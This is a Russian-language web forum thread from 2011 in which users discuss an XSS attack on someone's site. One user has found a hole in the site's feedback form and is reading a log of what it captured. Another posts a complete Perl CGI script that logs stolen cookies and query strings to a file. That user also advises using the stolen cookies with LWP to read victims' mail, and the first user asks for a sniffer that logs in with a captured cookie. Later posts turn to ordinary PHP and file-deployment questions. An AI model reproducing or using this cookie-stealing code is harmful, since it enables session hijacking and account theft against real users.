Вниз  PHP
- 28.12.2011 / 14:34
абормот
  Пользователь

абормот 
Сейчас: Offline
Alsawin, Да,хотя это не так важно. Мне php не дают,только cgi
- 28.12.2011 / 14:37
абормот
  Пользователь

абормот 
Сейчас: Offline
у одного лоха нашел дыру. В обратной связи,сейчас лог смотрел,пишит. Но он не совсем лох,пасс сменил видимо.
- 28.12.2011 / 22:44
Лека
  Пользователь

Лека 
Сейчас: Offline
абормот (28.12.2011/13:03)
$data = $ENV{'QUERY_STRING'};$name = $ENV{'SERVER_NAME'};open(LOG,">>cook.txt");$name = $ENV{' print(LOG "$name\t"); print(LOG "$data\n");close(LOG);print "xss активирован\n";
Абормот,не издивайся над языком. Если пишишь каку так делай из нее канфетку.
  1. #!/usr/bin/perl
  2.  
  3. use CGI::Carp qw(fatalsToBrowser);
  4. print "Content-type: text/plain; charset=utf-8\n\n";
  5. $name = $ENV{'HTTP_REFERER'};
  6. open(LOG,">>cook.txt");
  7.    print(LOG "$name\t");
  8. ($day, $month, $year) = (localtime)[3,4,5];
  9. $year=$year+1900;
  10. $month=$month+1;
  11. print(LOG "$year$month$day\n");
  12. @values = split(/;/,$ENV{'QUERY_STRING'});
  13. foreach $get (@values) {
  14.     ($varname, $vardata)
  15. = split(/=/,$get);
  16.     print(LOG "\t$varname = $vardata\n");
  17. }
  18.     print(LOG "*****************************************************************\n");
  19. close(LOG);
  20.  
  21. print "xss activated\n";
a вот саму хсс сам ищи. Твой вариан не то. Разбираешь куки и используй их на лету,читай письма,смотри скрытые данные. Разумеется что надо в начале кода юзать лвп или курл,но лвп лучьше и быстрей.
- 28.12.2011 / 23:29
абормот
  Пользователь

абормот 
Сейчас: Offline
Лека, а можно примерчик?чтоб снифер авторизовался получив куку?
- 29.12.2011 / 00:30
Koenig
  Модератор форума

Koenig 
Сейчас: Offline
Файлы поменять не проблема, ну вылетит ошибка у юзера, обновит страницу и все. На ходу менять и не думать. Можно ночью
__________________
 Магистр Мёда
- 29.12.2011 / 15:20
Alsawin
  Пользователь

Alsawin 
Сейчас: Offline
Koenig, да, но мы то обсуждали самый быстрый вариант :)
- 29.12.2011 / 19:49
абормот
  Пользователь

абормот 
Сейчас: Offline
самый быстрый это тот что я предложил первым. Создай субдомен,на том же сервере и настраивай его,а переименовать две папки в ручную это минута,перлом и маргнуть0не0успеешь .
- 29.12.2011 / 21:31
Koenig
  Модератор форума

Koenig 
Сейчас: Offline
абормот, По фтп новые заливаешь с заменой и их поочереди все поменяет, не критично в общем
__________________
 Магистр Мёда
- 30.12.2011 / 14:02
Kosma
  Пользователь

Kosma 
Сейчас: Offline
Как проверить на базе совпадание данных?
- 30.12.2011 / 14:41
Koenig
  Модератор форума

Koenig 
Сейчас: Offline
Kosma, А конкретнее? Вообще сравнивать можно == === != !== > < <= >=
__________________
 Магистр Мёда
Наверх  Всего сообщений: 1350
Фильтровать сообщения
Поиск по теме
Файлы топика (36)